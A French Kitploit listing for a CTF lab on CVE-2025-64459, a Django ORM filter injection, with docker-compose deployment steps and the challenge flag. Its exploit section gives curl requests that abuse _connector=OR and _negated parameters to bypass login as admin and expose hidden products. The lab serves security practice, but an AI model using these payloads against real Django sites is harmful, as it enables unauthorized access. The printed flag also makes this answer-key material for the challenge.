Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-64459 — Défi CTF démontrant l'injection de filtre ORM Django (CVE-2025-64459) avec contournement d'authentification et contournement de filtre de produit, y compris le déploiement et la récupération du drapeau. | Kitploit
Outils/GitHubGitHub/z3yr0xx/cve-2025-64459
Analyse des VulnérabilitésExploitation d'Applications WebSécurité WebCTFApprentissage et ÉducationLabs et Pratique
GitHubz3yr0xx/cve-2025-64459

CVE-2025-64459

Défi CTF démontrant l'injection de filtre ORM Django (CVE-2025-64459) avec contournement d'authentification et contournement de filtre de produit, y compris le déploiement et la récupération du drapeau.

Voir le dépôt
2il y a 9 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Défi CTF : Django ORM Injection (CVE-2025-64459)

Catégorie : Sécurité Web
Difficulté : Moyenne
Vulnérabilité : CVE-2025-64459 - Injection de filtre Django ORM

📝 Description

Nous avons construit une boutique de marchandises sécurisée avec un panneau d'administration. Pouvez-vous contourner l'authentification et trouver la note privée de l'administrateur ?

URL : http://YOUR_SERVER:6008

🚀 Déploiement

root@kitploit:~
cd web_django_cve
docker-compose up --build -d

🎯 Exploits (CVE-2025-64459)

Contournement d'authentification (/login/)

root@kitploit:~
# Using _connector=OR
curl "http://HOST:8054/login/?username=admin&_connector=OR&is_superuser=True"

# Using _negated
curl "http://HOST:8054/login/?username=admin&_negated=True"

Contournement du filtre de produit (/)

root@kitploit:~
# Negate is_public filter
curl "http://HOST:8054/?_negated=True"

# Direct access
curl "http://HOST:8054/?is_public=False"

🏁 Drapeau

lol-you-here_then-you_exploited_me

Télécharger l’outil